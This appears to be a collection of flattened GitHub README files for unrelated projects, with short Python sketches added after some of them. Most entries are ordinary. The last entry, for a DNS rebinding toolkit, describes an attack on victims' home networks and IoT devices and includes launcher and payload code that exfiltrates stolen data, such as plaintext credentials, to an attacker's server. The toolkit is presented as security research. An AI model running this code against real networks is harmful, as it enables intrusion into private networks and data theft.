jupyter notebook with magic commands to query database acknowledgement credits to udacity for the templates
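The star schema described above can be sketched with the stdlib sqlite3 module standing in for postgres/psycopg2, so it runs without a database server. Table and column names follow the README's schema; the sample rows are invented for illustration:

```python
import sqlite3

def build_star_schema(conn):
    """Create the 1 fact table (songplays) and 4 dimension tables from the README."""
    conn.executescript("""
        CREATE TABLE users  (user_id INTEGER PRIMARY KEY, first_name TEXT, level TEXT);
        CREATE TABLE artists(artist_id TEXT PRIMARY KEY, name TEXT);
        CREATE TABLE songs  (song_id TEXT PRIMARY KEY, title TEXT, artist_id TEXT);
        CREATE TABLE time   (start_time TEXT PRIMARY KEY, hour INTEGER, weekday INTEGER);
        -- fact table: one row per song play, keyed into the four dimensions
        CREATE TABLE songplays (
            songplay_id INTEGER PRIMARY KEY,
            start_time  TEXT REFERENCES time(start_time),
            user_id     INTEGER REFERENCES users(user_id),
            song_id     TEXT REFERENCES songs(song_id),
            artist_id   TEXT REFERENCES artists(artist_id)
        );
    """)

def run_demo():
    conn = sqlite3.connect(":memory:")
    build_star_schema(conn)
    cur = conn.cursor()
    cur.execute("INSERT INTO users VALUES (1, 'ada', 'paid')")
    cur.execute("INSERT INTO artists VALUES ('a1', 'some artist')")
    cur.execute("INSERT INTO songs VALUES ('s1', 'some song', 'a1')")
    cur.execute("INSERT INTO time VALUES ('2018-11-01 21:01:46', 21, 3)")
    cur.execute("INSERT INTO songplays VALUES (1, '2018-11-01 21:01:46', 1, 's1', 'a1')")
    # a typical star-schema query: join the fact table out to two dimensions
    cur.execute("""
        SELECT u.first_name, s.title
        FROM songplays sp
        JOIN users u ON sp.user_id = u.user_id
        JOIN songs s ON sp.song_id = s.song_id
    """)
    return cur.fetchall()
```

The point of the star layout is exactly this query shape: analytics questions join the central fact table out to whichever dimensions they need.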
server
ixo-blockchain
ixo blockchain github release latest by date https img shields io github v release ixofoundation ixo blockchain color white label release style flat square https github com ixofoundation ixo blockchain releases latest github release date https img shields io github release date ixofoundation ixo blockchain label date color white style flat square github release latest by date including pre releases https img shields io github v release ixofoundation ixo blockchain color 00d2ff include prereleases label candidate style flat square https github com ixofoundation ixo blockchain releases github license https img shields io github license ixofoundation ixo blockchain color lightgrey style flat square https github com ixofoundation ixo blockchain blob main license github go mod go version https img shields io github go mod go version ixofoundation ixo blockchain color lightgrey style flat square github repo size https img shields io github repo size ixofoundation ixo blockchain color lightgrey style flat square go report card https goreportcard com badge github com ixofoundation ixo blockchain https goreportcard com report github com ixofoundation ixo blockchain discord https img shields io badge discord 7289da style for the badge logo discord logocolor white https discord com invite ixo telegram https img shields io badge telegram 2ca5e0 style for the badge logo telegram logocolor white https t me ixonetwork twitter https img shields io badge twitter 1da1f2 style for the badge logo twitter logocolor white https twitter com ixoworld medium https img shields io badge medium 12100e style for the badge logo medium logocolor white https medium com ixo blog p align center img src github assets readme banner png p br the ixo blockchain is a layer 1 blockchain that runs on both testnet and mainnet it is built using the cosmos sdk https docs cosmos network main tendermint https docs tendermint com and ibc https ibc cosmos network and was one of the earliest networks to 
incorporate these technologies the recent addition of cosmwasm https github com cosmwasm wasmd in v0 19 3 demonstrates ixo s commitment to ongoing innovation and evolution have a look at go mod https github com ixofoundation ixo blockchain blob main go mod for specific dependencies and their most recent versions the ixo blockchain powers client applications for coordinating financing and verifying impacts the impacts wallet https github com ixofoundation ixo mobile dev jambo https github com ixofoundation jambo and launchpad https github com ixofoundation ixo webclient are examples of client applications that use the ixo blockchain the impacts sdk https www npmjs com package ixo impactxclient sdk makes it simple to interact with the ixo blockchain how to contribute if you are interested in contributing to the ixo blockchain you can start by reviewing the documentation on our website https docs ixo foundation ixo developers there are many opportunities to get involved such as contributing code or participating in community discussions our community is passionate about using blockchain technology to create positive impacts in the world we believe in the power of collaboration and innovation to drive change and we welcome anyone who shares our vision to join us on discord or telegram
golang
blockchain
front-end-developer-challenge
front end developer challenge in this repo you will find a mock up and all the necessary assets in a separate folder the design is of a tool for a fictitious game called titanstar legends and will not be repurposed or otherwise utilized by d d beyond it is only a coding challenge below are specific requirements we have which cannot be adequately expressed through the mock up this is not a timed assignment but it should probably take a couple of hours when you re done submit a link to your test s github repository we ask that you have your assessment completed and returned within 7 days of receiving it good luck if you feel that you have a personal project that closely resembles this project send us the repo and we ll evaluate that project instead only your contributions will be evaluated and the project must demonstrate the following competencies with making an app mobile friendly responsive creating and utilizing modern styling creating a stateful js application assessment expectations code reviewers will be directed to pay special attention to the following styles of submission match the provided mock all functionality defined above is present in the submission code organisation and maintainability if a js framework is used are that libraries best practices followed any novel or additional features beyond the given scope you may utilize scss less css modules css in js to create necessary styles but please avoid utilizing any frameworks or libraries that are already styled you may utilize a reset or normalize file if you would like rune mastery loadout talent calculator 9000 players of titanstar legends can spend talent points that they ve collected on runes within a tree we need to write a js application that simulates the rune tree within the game so players can replicate their in game loadouts to share with the titanstar legends community example assets example png left click to add points right click to remove points the user may only use up to 6 points each 
item only accounts for one point displays current point total the user must select the items in order for example the user may not put a point in the cake without first having put points in the chevrons and the silverware in that order
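The loadout rules above (a 6-point budget, one point per item, items in a path selectable only in order) can be sketched as plain state logic. The challenge asks for a JS front end, so this Python model is only an illustration, and the path/item names are made up:

```python
class RuneTree:
    """State model for the talent calculator rules: 6-point cap, strict in-path order."""
    MAX_POINTS = 6

    def __init__(self, paths):
        # paths: {"path name": ["item1", "item2", ...]} in prerequisite order
        self.paths = paths
        self.taken = {name: 0 for name in paths}  # points spent per path

    @property
    def total(self):
        return sum(self.taken.values())

    def add_point(self, path):
        """Left click: spend one point on the next item in a path."""
        if self.total >= self.MAX_POINTS:
            return False  # point budget exhausted
        if self.taken[path] >= len(self.paths[path]):
            return False  # path already complete
        self.taken[path] += 1  # always the next item, so order is enforced
        return True

    def remove_point(self, path):
        """Right click: refund the most recently taken item in a path."""
        if self.taken[path] == 0:
            return False
        self.taken[path] -= 1
        return True

# hypothetical paths/items, mirroring the mock-up's two rows of four runes
tree = RuneTree({"talent path 1": ["chevrons", "silverware", "cake", "crown"],
                 "talent path 2": ["boat", "snorkel", "fins", "lightning"]})
```

Tracking only a per-path count is what enforces the ordering rule: a point can never land on the cake before the chevrons and the silverware, because points always go to the next unfilled slot.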
coding-challenge dndbeyond
front_end
DriveLikeAHuman
drive like a human static badge https img shields io badge arxiv pdf 8a2be2 logo arxiv https arxiv org abs 2307 07162 hugging face spaces https img shields io badge f0 9f a4 97 20hugging 20face live demo blue https huggingface co spaces wayne lc drive like human static badge https img shields io badge homepage drive like a human 00cec9 drive like a human rethinking autonomous driving with large language models news try out our web demo on hugging face https huggingface co spaces wayne lc drive like human without any deployment closed loop interaction ability in driving scenarios https github com pjlab adg drivelikeahuman assets 18390668 0ec8e901 9dc1 4c89 81d6 994309a49630 img assets closeloop png pre requirement bash pip install highway env pip install r requirements txt running hellm py allows you to experience llm s closed loop driving in highwayenv first you need to modify config yaml to configure your llm yaml openai api type azure azure or openai for openai openai key sk xxxxxxxxxxx your openai key for azure azure model xxxxx your deployment model name azure api base https xxxxxxxx openai azure com your deployment endpoint azure api key xxxxxx your deployment key azure api version 2023 03 15 preview we use gpt 3 5 recommend models with 8k max tokens as the default llm but you can also refer to langchain large language models https python langchain com docs modules model io models to define your own llm in this case you need to modify lines 24 40 of hellm py to configure your own llm python if openai config openai api type azure os environ openai api type openai config openai api type os environ openai api version openai config azure api version os environ openai api base openai config azure api base os environ openai api key openai config azure api key llm azurechatopenai deployment name openai config azure model temperature 0 max tokens 1024 request timeout 60 elif openai config openai api type openai os environ openai api key openai config openai key
llm chatopenai temperature 0 model name gpt 3 5 turbo 16k 0613 or any other model with 8k context max tokens 1024 request timeout 60 then by running python hellm py you can see the process of llm making decisions using tools img assets close loop case 1 png img assets close loop case 2 png reasoning ability with common sense try it with your own image in hugging face https huggingface co spaces wayne lc drive like human or deploy your own with this notebook casereasoning ipynb img assets reasoning 1 png img assets reasoning 2 png performance enhancement through memorization ability img assets memorization png cite misc fu2023drive title drive like a human rethinking autonomous driving with large language models author daocheng fu and xin li and licheng wen and min dou and pinlong cai and botian shi and yu qiao year 2023 eprint 2307 07162 archiveprefix arxiv primaryclass cs ro acknowledgments we would like to thank the authors and developers of the following projects this project is built upon these great open sourced projects highway env https github com farama foundation highwayenv langchain https github com hwchase17 langchain llama adapter https github com opengvlab llama adapter contact if you have any questions please report issues on github
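The azure/openai branch in lines 24-40 of hellm py boils down to exporting different environment variables per provider before the llm object is built. A stdlib-only sketch of that branching (the AzureChatOpenAI/ChatOpenAI construction is deliberately omitted so nothing needs an api key; the config keys mirror the config yaml shown above):

```python
import os

def apply_openai_config(config, env=os.environ):
    """Set provider-specific environment variables from a parsed config.yaml dict.

    Sketch of the branching in hellm.py; the langchain LLM construction that
    follows this step in the real script is omitted here.
    """
    api_type = config["OPENAI_API_TYPE"]
    if api_type == "azure":
        env["OPENAI_API_TYPE"] = "azure"
        env["OPENAI_API_VERSION"] = config["AZURE_API_VERSION"]
        env["OPENAI_API_BASE"] = config["AZURE_API_BASE"]
        env["OPENAI_API_KEY"] = config["AZURE_API_KEY"]
    elif api_type == "openai":
        env["OPENAI_API_KEY"] = config["OPENAI_KEY"]
    else:
        raise ValueError(f"unknown OPENAI_API_TYPE: {api_type!r}")
    return env
```

Passing `env` explicitly (any mapping works) keeps the function testable without touching the real process environment.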
ai
ComputerVisionPractice
computervisionpractice

imageprocessing
- opencv 1 roi cv https www cnblogs com wj 1314 p 11881270 html
- opencv 2 mask https www cnblogs com wj 1314 p 9592346 html
- opencv 3 https www cnblogs com wj 1314 p 13043794 html
- opencv 4 https www cnblogs com wj 1314 p 11693364 html
- opencv 5 https www cnblogs com wj 1314 p 12084636 html
- opencv 6 sobel scharr laplacian canny https www cnblogs com wj 1314 p 9800272 html
- opencv 7 https www cnblogs com wj 1314 p 11981974 html
- opencv 8 https www cnblogs com wj 1314 p 11510789 html
- opencv 9 https www cnblogs com wj 1314 p 9444056 html
- opencv 10 https www cnblogs com wj 1314 p 11983496 html
- opencv 11 https www cnblogs com wj 1314 p 12166917 html
- opencv 12 k means https www cnblogs com wj 1314 p 12191084 html
- opencv 13 harris sift https www cnblogs com wj 1314 p 13364875 html
- opencv 14 png jpg bmp opencv mask https www cnblogs com wj 1314 p 17507400 html

imageprocessingpractice opencv
- opencv 1 ocr opencv https www cnblogs com wj 1314 p 9472962 html
- opencv 2 https www cnblogs com wj 1314 p 9578493 html
- tensorflow opencv 3 python https www cnblogs com wj 1314 p 11331708 html
- opencv 4 ocr https www cnblogs com wj 1314 p 11975977 html

visionpro cognex visionpro
- visionpro 1 https www cnblogs com wj 1314 p 11975977 html https www cnblogs com wj 1314 p 17121301 html
- visionpro 2 imagecoverttool https www cnblogs com wj 1314 p 17504248 html
- visionpro 3 beadinspecttool https www cnblogs com wj 1314 p 11323013 html
- visionpro 4 patinspect https www cnblogs com wj 1314 p 10769155 html
computer-vision opencv-python
ai
cs224n
stanford cs 224n natural language processing with deep learning self study on stanford cs 224n winter 2020 special thanks to stanford and professor chris manning for making this great resources online and free to the public no access to autograder thus no guarantee that the solutions are correct lecture videos cs 224n winter 2019 https www youtube com playlist list ploromvodv4rohcuxmzknm7j3fvwbby42z lecture slides cs 224n winter 2019 slides lecture notes cs 224n winter 2019 notes assignment 1 heavy check mark constructed count vectorized embeddings using co occurance matrix and used gensim word2vec to study predictions and language biases assignment 2 heavy check mark implemented and trained word2vec in numpy written understanding word2vec a2 a2 written pdf coding implementing word2vec a2 readme md word vectors a2 word vectors png assignment 3 heavy check mark written and coding a3 readme md assignment 4 heavy check mark coding neural machine translation with rnn a4 readme md left local windows 10 machine with rtx 2080 ti training overnight hit early stopping at around 11 hours test bleu score 35 89 train a4 outputs train png test a4 outputs test png written analyzing nmt systems a4 a4 written pdf assignment 5 public heavy check mark trained using batch size 64 vs default 32 and set max epoch 60 vs default 30 on a local rtx 2080 ti gpu memory at 10 11gb training reached maximum number of epochs after 34 hours with training loss at the low 70s and validation perplexity at 59 average words per second is around 2000 words per second test bleu score 27 96 coding neural machine translation with rnn a5 public readme md train a5 public assets training2 png test a5 public assets test2 png written neural machine translation with rnn a5 public a5 written pdf license all slides notes assignments and provided code scaffolds are owned by stanford university
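Assignment 1's count-based embeddings start from a co-occurrence matrix over a corpus. A tiny dependency-free sketch of that first step (the assignment itself uses numpy and then reduces the matrix with truncated SVD, which is skipped here):

```python
from collections import Counter

def co_occurrence(corpus, window=1):
    """Build a dense co-occurrence matrix: matrix[i][j] counts how often
    word j appears within `window` positions of word i in the corpus."""
    vocab = sorted({w for sent in corpus for w in sent})
    index = {w: i for i, w in enumerate(vocab)}
    counts = Counter()
    for sent in corpus:
        for i, w in enumerate(sent):
            lo, hi = max(0, i - window), min(len(sent), i + window + 1)
            for j in range(lo, hi):
                if j != i:
                    counts[(index[w], index[sent[j]])] += 1
    n = len(vocab)
    matrix = [[counts[(i, j)] for j in range(n)] for i in range(n)]
    return vocab, matrix
```

The rows of this matrix are the raw count vectors; dimensionality reduction over them gives the embeddings the assignment then compares against gensim's word2vec.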
natural-language-processing stanford-nlp stanford cs224n 2020 cs224n-assignment-solutions cs224nwinter2020 pytorch
ai
TensorFlow-Book
machine learning with tensorflow http www tensorflowbook com this https github com binroot tensorflow book is the official code repository for machine learning with tensorflow http www tensorflowbook com get started with machine learning using tensorflow google s latest and greatest machine learning library summary chapter 2 https github com binroot tensorflow book tree master ch02 basics tensorflow basics concept 1 defining tensors concept 2 evaluating ops concept 3 interactive session concept 4 session loggings concept 5 variables concept 6 saving variables concept 7 loading variables concept 8 tensorboard chapter 3 https github com binroot tensorflow book tree master ch03 regression regression concept 1 linear regression concept 2 polynomial regression concept 3 regularization chapter 4 https github com binroot tensorflow book tree master ch04 classification classification concept 1 linear regression for classification concept 2 logistic regression concept 3 2d logistic regression concept 4 softmax classification chapter 5 https github com binroot tensorflow book tree master ch05 clustering clustering concept 1 clustering concept 2 segmentation concept 3 self organizing map chapter 6 https github com binroot tensorflow book tree master ch06 hmm hidden markov models concept 1 forward algorithm concept 2 viterbi decode chapter 7 https github com binroot tensorflow book tree master ch07 autoencoder autoencoders concept 1 autoencoder concept 2 applying an autoencoder to images concept 3 denoising autoencoder chapter 8 https github com binroot tensorflow book tree master ch08 rl reinforcement learning concept 1 reinforcement learning chapter 9 https github com binroot tensorflow book tree master ch09 cnn convolutional neural networks concept 1 using cifar 10 dataset concept 2 convolutions concept 3 convolutional neural network chapter 10 https github com binroot tensorflow book tree master ch10 rnn recurrent neural network concept 1 loading timeseries data concept 2 
recurrent neural networks concept 3 applying rnn to real world data for timeseries prediction chapter 11 https github com binroot tensorflow book tree master ch11 seq2seq seq2seq model concept 1 multi cell rnn concept 2 embedding lookup concept 3 seq2seq model chapter 12 https github com binroot tensorflow book tree master ch12 rank ranking concept 1 ranknet concept 2 image embedding concept 3 image ranking
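Chapter 3's linear regression concept can be illustrated without TensorFlow at all: minimise mean squared error for y = w*x + b by gradient descent. The data and hyperparameters below are illustrative only, not taken from the book:

```python
def fit_linear(xs, ys, lr=0.05, epochs=2000):
    """Fit y = w*x + b by batch gradient descent on mean squared error."""
    w, b = 0.0, 0.0
    n = len(xs)
    for _ in range(epochs):
        # gradients of MSE = (1/n) * sum((w*x + b - y)^2)
        grad_w = sum(2 * (w * x + b - y) * x for x, y in zip(xs, ys)) / n
        grad_b = sum(2 * (w * x + b - y) for x, y in zip(xs, ys)) / n
        w -= lr * grad_w
        b -= lr * grad_b
    return w, b

# noiseless points on the line y = 2x + 1, so the fit should recover w≈2, b≈1
w, b = fit_linear([0, 1, 2, 3, 4], [1, 3, 5, 7, 9])
```

The TensorFlow version in the book builds the same loss as a graph and lets an optimizer take these gradient steps automatically; the update rule is identical.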
tensorflow machine-learning regression convolutional-neural-networks logistic-regression book reinforcement-learning autoencoder linear-regression classification clustering
ai
RUPP_WCT
rupp wct royal university of phnom penh bachelor of it engineering year 3 semester 1 course web cloud technology
cloud
To-Do-List
to do list a todo list web app which can be used to keep track of your tasks and stay productive i created this while learning backend web development using node express and mongodb
server
system-design-bangla
p align center img src images system design wallpaper png alt system design wallpaper p https www buymeacoffee com lahin31 section 1 system design section 1 system design section 2 database sql and nosql section 2 database sql and nosql section 3 client server architecture section 3 client server architecture section 4 reliability section 4 reliability section 5 performance metrics section 5 performance metrics section 6 distributed system section 6 distributed system section 7 domain name system section 7 domain name system section 8 http and https section 8 http and https section 9 functional and non functional requirements section 9 functional and non functional requirements section 10 back of the envelope estimation section 10 back of the envelope estimation section 11 stateful and stateless architecture section 11 stateful and stateless architecture section 12 proxy section 12 proxy section 13 rest api section 13 rest api section 14 scalability section 14 scalability section 15 database sharding section 15 database sharding section 16 database replication section 16 database replication section 17 caching section 17 caching section 18 content delivery network section 18 content delivery network section 19 cap theorem section 19 cap theorem section 20 consistent hashing section 21 polling and streaming section 21 polling and streaming section 22 distributed messaging system section 23 how live streaming works section 24 how oauth2 works section 25 design url shortener section 26 design a rate limiter section 27 design a chat system section 28 design a notification system section 29 design high availability resilience system section 30 how discord stores trillions of messages section 31 how grab stores and processes millions of orders daily section 32 resources section 32 resources section 1 system design section 2 database sql and nosql sql nosql sql nosql relation relation key value graph document nosql sections database readme md section 3 client server 
architecture p align center img src images csa png alt client server architecture p section 4 reliability fault error reliable fault failure fault user failure warning message reliable sections reliability readme md section 5 performance metrics throughput throughput api request throughput time to first byte resource request first byte of response request first byte time to first byte sections performance metrics readme md section 6 distributed system end user shared state concurrently information distributed system youtube youtube user video upload video watch distributed system youtube section 7 domain name system domain name system dns human readable domain www google com ip url www google com dns url ip address ip address dns resolver dns resolver human readable domain ip root server com org net ip dns resolver com com ip org org ip top level domain server top level domain www google com tld com authorititve server authorititve server human readable domain www google com ip p align center img src images dns png alt dns p section 8 http and https http hypertext transfer protocol http web browser web server communication set of rules text image section 9 functional and non functional requirements functional requirements functional requirement functional requirement non functional requirements quality characteristics performance security cost scalability reliability non functional requirement section 10 back of the envelope estimation load balancer cdn sections back of the envelop estimation readme md section 11 stateful and stateless architecture stateful store maintain application fttp stateful stateful web socket web socket bidirectional full duplex protocol server store client server stateless store maintain application database cache http stateless http stateless architecture protected resource request cookie token server cookie token sections stateless stateful architecture readme md section 12 proxy nginx sections proxy readme md section 13 rest api rest 
api rest rest representational state transfer rest api http methods get post put patch delete rest api sections rest api readme md section 14 scalability 2 vertical scalability horizontal scalability sections scalability readme md section 15 database sharding database sharding row row shard distribute database sharding p align center img src images sharding png alt sharding p sections database sharding readme md section 16 database replication database replication strategy master database slave database master database insert delete update slave database master database copy read operation p align center img src images db replication png alt database replication p database replication sql nosql sections db replication readme md section 17 caching caching expensive response read api fast latency reduce fault tolarence p align center img src images caching1 png alt caching p sections caching readme md section 18 content delivery network content delivery network cdn js css images videos p align center img src images cdn 1 png alt cdn p cdn india bangladesh content request content latency bangladesh england request latency cdn point of presence pop pop edge server sections cdn readme md section 19 cap theorem distributed database system c consistency a availability p partition tolerance consistency transection consistent value availability read write process message request process partition tolerance connection read write sections cap theorem readme md section 21 polling and streaming polling client regular interval server p align center img src images polling png alt polling p streaming socket disconnect event streaming chat application p align center img src images streaming png alt streaming p sections polling and streaming readme md section 32 resources a href https github com donnemartin system design primer target blank system design primer by donne martin free a a href https www amazon com designing data intensive applications reliable maintainable dp 
1449373321 target blank designing data intensive pplications paid a a href amazon com system design interview insiders guide dp 1736049119 target blank system design interview by alex xu paid a
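Section 20's consistent hashing can be sketched as a hash ring: each server owns many virtual nodes on the ring, and a key is served by the first server clockwise from the key's hash. Server and key names below are made up:

```python
import bisect
import hashlib

class HashRing:
    """Minimal consistent-hashing ring with virtual nodes."""

    def __init__(self, servers, vnodes=100):
        self.ring = []  # sorted list of (hash, server)
        for server in servers:
            for v in range(vnodes):
                self.ring.append((self._hash(f"{server}#{v}"), server))
        self.ring.sort()
        self.keys = [h for h, _ in self.ring]  # parallel list for bisect

    @staticmethod
    def _hash(value):
        return int(hashlib.md5(value.encode()).hexdigest(), 16)

    def lookup(self, key):
        """Return the server responsible for `key`: first vnode clockwise
        from the key's position, wrapping around the ring."""
        i = bisect.bisect(self.keys, self._hash(key)) % len(self.ring)
        return self.ring[i][1]
```

The payoff over `hash(key) % num_servers` is on membership change: removing a server only remaps the keys that pointed at its vnodes (roughly 1/N of them), while every other key keeps its assignment.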
os
reliabel.github.io
this project was bootstrapped with create react app https github com facebook create react app available scripts in the project directory you can run npm start runs the app in the development mode br open http localhost 3000 http localhost 3000 to view it in the browser the page will reload if you make edits br you will also see any lint errors in the console npm test launches the test runner in the interactive watch mode br see the section about running tests https facebook github io create react app docs running tests for more information npm run build builds the app for production to the build folder br it correctly bundles react in production mode and optimizes the build for the best performance the build is minified and the filenames include the hashes br your app is ready to be deployed see the section about deployment https facebook github io create react app docs deployment for more information npm run eject note this is a one way operation once you eject you can t go back if you aren t satisfied with the build tool and configuration choices you can eject at any time this command will remove the single build dependency from your project instead it will copy all the configuration files and the transitive dependencies webpack babel eslint etc right into your project so you have full control over them all of the commands except eject will still work but they will point to the copied scripts so you can tweak them at this point you re on your own you don t have to ever use eject the curated feature set is suitable for small and middle deployments and you shouldn t feel obligated to use this feature however we understand that this tool wouldn t be useful if you couldn t customize it when you are ready for it learn more you can learn more in the create react app documentation https facebook github io create react app docs getting started to learn react check out the react documentation https reactjs org code splitting this section has moved here https facebook 
github io create react app docs code splitting analyzing the bundle size this section has moved here https facebook github io create react app docs analyzing the bundle size making a progressive web app this section has moved here https facebook github io create react app docs making a progressive web app advanced configuration this section has moved here https facebook github io create react app docs advanced configuration deployment this section has moved here https facebook github io create react app docs deployment npm run build fails to minify this section has moved here https facebook github io create react app docs troubleshooting npm run build fails to minify
server
dns-rebind-toolkit
dns rebind toolkit demo http rebind network security advisory https medium com brannondorsey attacking private networks from the internet with dns rebinding ea7098a2d325 included payloads payloads readme md faq faq md disclaimer this software is for educational purposes only this software should not be used for illegal activity the author is not responsible for its use don t be a dick dns rebind toolkit is a frontend javascript framework for developing dns rebinding https en wikipedia org wiki dns rebinding exploits against vulnerable hosts and services on a local area network lan it can be used to target devices like google home roku sonos wifi speakers wifi routers smart thermostats and other iot devices with this toolkit a remote attacker can bypass a router s firewall and directly interact with devices on the victim s home network exfiltrating private information and in some cases even controlling the vulnerable devices themselves the attack requires a victim on the target network to simply follow a link or be shown an html ad containing a malicious iframe from there the victim s web browser is used like a proxy to directly access other hosts connected to their home network these target machines and services would otherwise be unavailable to the attacker from the internet the remote attacker may not know what those services are or what ip addresses they occupy on the victim s network but dns rebind toolkit handles this by brute forcing hundreds of likely ip addresses under the hood this tool makes use of a public whonow dns server https github com brannondorsey whonow running on rebind network 53 to execute the dns rebinding attack and fool the victim s web browser into violating the same origin policy https en wikipedia org wiki same origin policy from there it uses webrtc https en wikipedia org wiki webrtc to leak the victim s private ip address say 192 168 1 36 it uses the first three octets of this local ip address to guess the network s subnet and then
inject 256 iframes from 192 168 1 0 255 delivering a payload to each host that could possibly be on the network subnet this toolkit can be used to develop and deploy your own dns rebinding attacks several real world attack payloads are included with this toolkit in the payloads payloads directory these payloads include information exfiltration and rickroll tom foolery attacks against a few popular iot devices including google home and roku products this toolkit is the product of independent security research into dns rebinding attacks you can read about that original research here https medium com brannondorsey attacking private networks from the internet with dns rebinding ea7098a2d325 getting started bash clone the repo git clone https github com brannondorsey dns rebind toolkit git cd dns rebind toolkit install dependencies npm install run the server using root to provide access to privileged port 80 this script serves files from the www examples share and payloads directories sudo node server by default server js serves payloads targeting google home roku sonos speakers phillips hue light bulbs and radio thermostat devices running their services on ports 8008 8060 1400 80 and 80 respectively if you ve got one of these devices on your home network navigate to http rebind network for a nice surprise open the developer s console and watch as these services are harmlessly exploited causing data to be stolen from them and exfiltrated to server js api and usage this toolkit provides two javascript objects that can be used together to create dns rebinding attacks dnsrebindattack share js dnsrebindattack js this object is used to launch an attack against a vulnerable service running on a known port it spawns one payload for each ip address you choose to target dnsrebindattack objects are used to create manage and communicate with multiple dnsrebindnode objects each payload launched by dnsrebindattack must contain a dnsrebindnode object dnsrebindnode share js 
dnsrebindnode js this static class object should be included in each html payload file it is used to target one service running on one host it can communicate with the dnsrebindattack object that spawned it and it has helper functions to execute the dns rebinding attack using dnsrebindnode rebind as well as exfiltrate data discovered during the attack to server js dnsrebindnode exfiltrate these two scripts are used together to execute an attack against unknown hosts on a firewall protected lan a basic attack looks like this 1 attacker sends victim a link to a malicious html page that launches the attack e g http example com launcher html launcher html contains an instance of dnsrebindattack 2 the victim follows the attacker s link or visits a page where http example com launcher html is embedded as an iframe this causes the dnsrebindattack on launcher html to begin the attack 3 dnsrebindattack uses a webrtc leak https github com diafygi webrtc ips to discover the local ip address of the victim machine e g 192 168 10 84 the attacker uses this information to choose a range of ip addresses to target on the victim s lan e g 192 168 10 0 255 4 launcher html launches the dns rebinding attack using dnsrebindattack attack against a range of ip addresses on the victim s subnet targeting a single service e g the undocumented google home rest api https rithvikvibhu github io ghlocalapi available on port 8008 5 at an interval defined by the user 200 milliseconds by default dnsrebindattack embeds one iframe containing payload html into the launcher html page each iframe contains one dnsrebindnode object that executes an attack against port 8008 of a single host defined in the range of ip addresses being attacked this injection process continues until an iframe has been injected for each ip address that is being targeted by the attack 6 each injected payload html file uses dnsrebindnode to attempt a rebind attack by communicating with a whonow dns server https github com 
brannondorsey whonow if it succeeds same origin policy is violated and payload html can communicate with the google home product directly usually payload html will be written in such a way that it makes a few api calls to the target device and exfiltrates the results to server js running on example com before finishing the attack and destroying itself note if a user has one google home device on their network with an unknown ip address and an attack is launched against the entire 192 168 1 0 24 subnet then one dnsrebindnode s rebind attack will be successful and 254 will fail examples an attack consists of three coordinated scripts and files an html file containing an instance of dnsrebindattack e g launcher html an html file containing the attack payload e g payload html this file is embedded into launcher html by dnsrebindattack for each ip address being targeted a dns rebinding toolkit server server js to deliver the above files and exfiltrate data if need be launcher html here is an example html launcher file you can find the complete document in examples launcher html examples launcher html html doctype html head title example launcher title head body this script is a dependency of dnsrebindattack js and must be included script type text javascript src share js eventemitter js script include the dns rebind attack object script type text javascript src share js dnsrebindattack js script script type text javascript dnsrebindattack has a static method that uses webrtc to leak the browser s ip address on the lan we ll use this to guess the lan s ip subnet if the local ip is 192 168 1 89 we ll launch 255 iframes targeting all ip addresses from 192 168 1 1 255 dnsrebindattack getlocalipaddress then ip launchrebindattack ip catch err console error err looks like our nifty webrtc leak trick didn t work doesn t work in some browsers no biggie most home networks are 192 168 1 1 24 launchrebindattack 192 168 1 1 function launchrebindattack localip convert 192 168 1 1 into
array from 192 168 1 0 192 168 1 255 const first3octets localip substring 0 localip lastindexof const ips array 256 keys map octet first3octets octet the first argument is the domain name of a publicly accessible whonow server https github com brannondorsey whonow i ve got one running on port 53 of rebind network you can use the services you are attacking might not be running on port 80 so you will probably want to change that too const rebind new dnsrebindattack rebind network 80 launch a dns rebind attack spawning 255 iframes attacking the service on each host of the subnet or so we hope arguments are 1 target ip addresses 2 ip address your node server js is running on usually 127 0 0 1 during dev but then the publicly accessible ip not hostname of the vps hosting this repo in production 3 the html payload to deliver to this service this html file should have a dnsrebindnode instance implemented in it 4 the interval in milliseconds to wait between each new iframe embed spawning 100 iframes at the same time can choke or crash a browser the higher this value the longer the attack takes but the fewer resources it consumes rebind attack ips 127 0 0 1 examples payload html 200 rebind nodes is also an eventemitter only this one is fired using dnsrebindnode emit this allows dnsrebindnodes inside of iframes to post messages back to the parent dnsrebindattack that launched them you can define custom events by simply emitting dnsrebindnode emit my custom event and a listener in rebind nodes can receive it that said there are a few standard event names that get triggered automagically begin triggered when dnsrebindnode js is loaded this signifies that an attack has been launched or at least its payload was delivered against an ip address rebind the dns rebind was successful this node should now be communicating with the target service exfiltrate send json data back to your node server js and save it inside the data folder additionally the dnsrebindnode destroy static
method will trigger the destroy event and cause dnsrebindattack to remove the iframe rebind nodes on begin ip the dnsrebindnode has been loaded attacking ip rebind nodes on rebind ip the rebind was successful console log node rebind ip rebind nodes on exfiltrate ip data json data was exfiltrated and saved to the data folder on the remote machine hosting server js console log node exfiltrate ip data data username crashoverride password hacktheplanet script body html payload html here is an example html payload file you can find the complete document in examples payload html examples payload html html doctype html html head title example payload title head body load the dnsrebindnode this static class is used to launch the rebind attack and communicate with the dnsrebindattack instance in example launcher html script type text javascript src share js dnsrebindnode js script script type text javascript attack then err there was an error at some point during the attack console error err dnsrebindnode emit fatal err message remove this iframe by calling destroy then dnsrebindnode destroy launches the attack and returns a promise that is resolved if the target service is found and correctly exploited or more likely rejected because this host doesn t exist the target service isn t running or something went wrong with the exploit remember that this attack is being launched against 255 ip addresses so most of them won t succeed async function attack dnsrebindnode has some default fetch options that specify things like no caching etc you can re use them for convenience or ignore them and create your own options object for each fetch request here are their default values method get headers this doesn t work in all browsers for instance firefox doesn t let you do this origin unset the origin header pragma no cache cache control no cache cache no cache const getoptions dnsrebindnode fetchoptions try in this example we ll pretend we are attacking some service with an auth json
file with username password sitting in plaintext before we swipe those creds we need to first perform the rebind attack most likely our browser will cache the dns results for this page s host dnsrebindnode rebind recursively re attempts to rebind the host with a new target ip address this can take over a minute and if it is unsuccessful the promise is rejected const opts these options get passed to the dns rebind fetch request fetchoptions getoptions by default dnsrebindnode rebind is considered successful if it receives an http 200 ok response from the target service however you can define any kind of rebind success scenario yourself with the successpredicate function this function receives a fetch result as a parameter and the return value determines if the rebind was successful i e you are communicating with the target server here we check to see if the fetchresult was sent by our example vulnerable server successpredicate fetchresult return fetchresult headers get server example vulnerable server v1 0 await the rebind can take over a minute depending on the victim s dns cache settings or if there is no host listening on the other side await dnsrebindnode rebind http location host auth json opts catch err whoops the rebind failed either the browser s dns cache was never cleared or more likely this service isn t running on the target host oh well bubble up the rejection and have our attack s rejection handler deal w it return promise reject err try alrighty 